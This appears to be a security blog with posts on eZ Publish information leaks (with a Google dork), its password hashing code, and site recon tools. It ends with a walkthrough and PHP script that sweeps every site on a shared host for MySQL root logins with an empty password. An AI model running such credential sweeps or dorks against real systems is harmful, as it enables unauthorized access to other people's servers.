Don’t help the police

One interesting headline in the Norwegian newspapers today is an allegedly hacking attempt on a Facebook account. The background story goes something like this:

Norwegian police are facing an abduction case of a 16 year old girl in Oslo. The police think that there might be some vital information on the Facebook profile of this victim – hence they’ve requested the log in details for her account from Facebook. Facebook allegedly provided them the desired information except her log in details. One “hacker” going rogue tried to hack her account going all Samaritan. Newspaper reports were not conclusive if he were successful or not.

With this information in mind consider this:

If you got the skill – do not attempt to help the police, ever! Please remember that the police need access to untampered information. If you break into a service, like Facebook or anything else, and provide them the “evidence” then the investigation team can not be sure if the data is clean. Last year we faced exactly the same thing regarding the massacre at Utøya island. Some hackers broke into Breivik’s account and the police were not sure if the information provided were fake or not. Sure – your intentions might be good. But you might end up causing a major headache for everyone.

So – whether you are a grey hat or a blackhat, or a skiddie – don’t go down this path. Play fair – lead the police in the proper direction instead.

eZ Publish – determine version, heartbeat and copyright

ez Publish provides us with a module called “ezinfo” which we can utilize to get important information about the running system. Amongst the information we can extract from this module is:

  • eZ Publish version
  • which modules installed
  • if the system is able to communicate with the back-end
  • copyright

Please note that “ezinfo” does not interface with any engines inside the kernel and that most often site administrator will have this module disabled.

How to access

For any eZ Publish based site you can visit this module by just appending “/ezinfo/view_name” to the base URL.

Views

There are three views currently available within ezinfo:

  • about
  • is_alive
  • copyright
about
This is by far the meatiest view available since it displays the version number of eZ Publish and which extensions which are in use.
is_alive
This view checks the database connection and if everything seems dandy, it will return the text “eZ Publish is alive!”. It should be a no brainer what this could be used for!
copyright
By far the least interesting view since it only displays the copyright information.

Google Dork

allinurl:/ezinfo/about

Words of advice

If you are running an eZ Publish based site – please consider disabling this “feature”.

ez Publish password encryption methods

It is always interesting looking at various CMS’s and how they implement security. For this post I’ll be covering the methods eZ Publish up to (at least) release 4.6 uses. This post is based on the following PHP class file: kernel\classes\datatypes\ezuser\ezuser.php. More information can be found there.

Various password constants and their use

The basis for this list is this static function:

static function createHash( $user, $password, $site, $type, $hash = false )
PASSWORD_HASH_MD5_PASSWORD
MD5 of password

        $str = md5( $password );
PASSWORD_HASH_MD5_USER
MD5 of user and password – which happens to be default.

        $str = md5( "$user\n$password" ); // notice the newline character!!!
PASSWORD_HASH_MD5_SITE
MD5 of site, user and password

        $str = md5( "$user\n$password\n$site" ); // again, notice the newline characters!!!
PASSWORD_HASH_MYSQL
Legacy support for mysql hashed passwords

            $db = eZDB::instance();
            $hash = $db->escapeString( $password ); // pay close attention to any escapes

            $str = $db->arrayQuery( "SELECT PASSWORD( '$hash' )" );
            $hashes = array_values( $str[0] );
            $str = $hashes[0];
PASSWORD_HASH_PLAINTEXT
Passwords in plaintext, should not be used for real sites

        $str = $password
PASSWORD_HASH_CRYPT
Crypted passwords

            if ( $hash ) // $hash is an input parameter initially set to false. Pay close attention to this.
            {
                $str = crypt( $password, $hash );
            }
            else
            {
                $str = crypt( $password );
            }

obtaining information about a site

The art of obtaining information has always been an important feature to quest for throughout the history. As someone once said, “knowledge is power”. The more we know about a thing the more are we able to master it, or conquer it. The same thing goes for web sites. The more we know what others do on their sites – the more can we be influenced to do a better job.

There are many CLI/CMD/GUI tools out there which allows you to get information about a site. That’s completely fine and dandy, but I prefer web based tools. Using web based tools allows me to do quick scans whenever I do not have my laptop available. Sometimes I just pull out information because I am nosy.

Here’s a small list over the tools I frequently use:

http://builtwith.com/
This tool will give you great overview over:

  • CDN (Content Delivery Network)
  • Webserver information
  • Javascript libraries
  • RSS
  • +++
http://guess.scritch.org/
  • Web server
  • PHP information (if available)
  • Framework information
http://whois.domaintools.com/
Looks up the WHOIS information for a site.
http://news.netcraft.com/
  • IP address
  • Hosting information
  • ++

Cascading MySQL mishap

A couple days ago I was doing some routine cleanup on a remote hosted site. I have paid access to this server and was working with the MySQL CLI tool. Both username and password is intricate. Just for the hell of it I tried one silly thing – connecting to the server using stock credentials. Voila – instant access. Was this only local for that site or not? Follow me in the quest for finding out!

About the hosting company

This hosting company is small and offer their services for cheap. Just like anyone else in the same segment. Even though I know exactly the platform offered I must put myself into context of an intruder. The very first thing I did was to enter their support page to find out what I’m dealing with here. Support FAQ claims they are running *AMPP. However they do not disclose which version of MySQL or which operating system. Also – the FAQ also mentions that you can access the PHPMyAdmin tool by prefixing “.db” to your URL. Handy information – and this is the basis for what we are going to do.

Since they are just an SMB, it means that they most likely have a very limited pool of IP addresses. Hence, they must be hosting multiple sites on the same address. In theory this could be a security risk since “any” mistakes might cascade through the entire stack of sites. Like in this scenario.

We’re now armed with pretty much what we need so – we just need a wee script to do the “heavy” lifting.

Investigation

Obtaining a list of targets

We assume they are hosting multiple sites on the same address – so let’s find out which sites exists. We are going to use an online service offered by “You Get Signal” in order to obtain such list.

  1. Visit You Get Signal
  2. Enter remote address
  3. Copy and paste the resulting list into Notepad.exe, Gedit or any text editor of choice
  4. Replace all occurrences of “(linkback)”
  5. Save text to file

Assess sites

Save the following script to the same place as the sites list above as “dbconnect.php”

/**
 * Read targets
 */

$content = file_get_contents($argv[1]);
$targets = explode(' ', $content);

/**
 * MySQL Connections
 */
$username = 'root';
$password = '';

foreach($targets as $server)
{
	$server = 'db.' . trim($server);

	$conn = mysqli_connect(
      	      trim($server),
	      $username,
	      $password
      	);

	if($conn)
	{
		print "\n{$server} is afflicted ...\n";
	}
	else
	{
		print ".";
	}

	mysqli_close($conn);
}

Execute this in CLI mode by issuing following (your setup may vary) command:
php.exe dbconnect.php sites_list.txt

What happens here?

This script will read the entire input list of sites and traverse it. For each URL it prefixes it with “db.” and tries to connect to by using common credentials (username root, empty password). If success, notify the user – else continue to process URL’s until empty.

Obtaining MySQL version and name of the operating system

If any of the URL’s is vulnerable it means you can connect to it by issuing following command in CLI, or similar:
mysql -uroot -p -h prefixedurl

Most likely you will not be able to perform any actions heres – but look at the header. It will reveal the name of the operating system and the MySQL version. Mission done. Armed with this information you might be able to find an exploit or two.

Aftermath

I did not find a vast amount of vulnerable sites – only quite a few. But nevertheless – they were vulnerable alright. But so what you might ask? If we know which operating system they run and which version, plus which version of the database server we can go hunting for exploits. The hosting company could be running a really outdated version of any of the tools said and would most likely be an easy target.

The web hosting company was notified two days ago but they have yet to respond.

Update August 11th:
Support has not replied to this notification. I have sent another support request on this issue. If they don’t respond within two days I’ll be disclosing the name of this hosting service.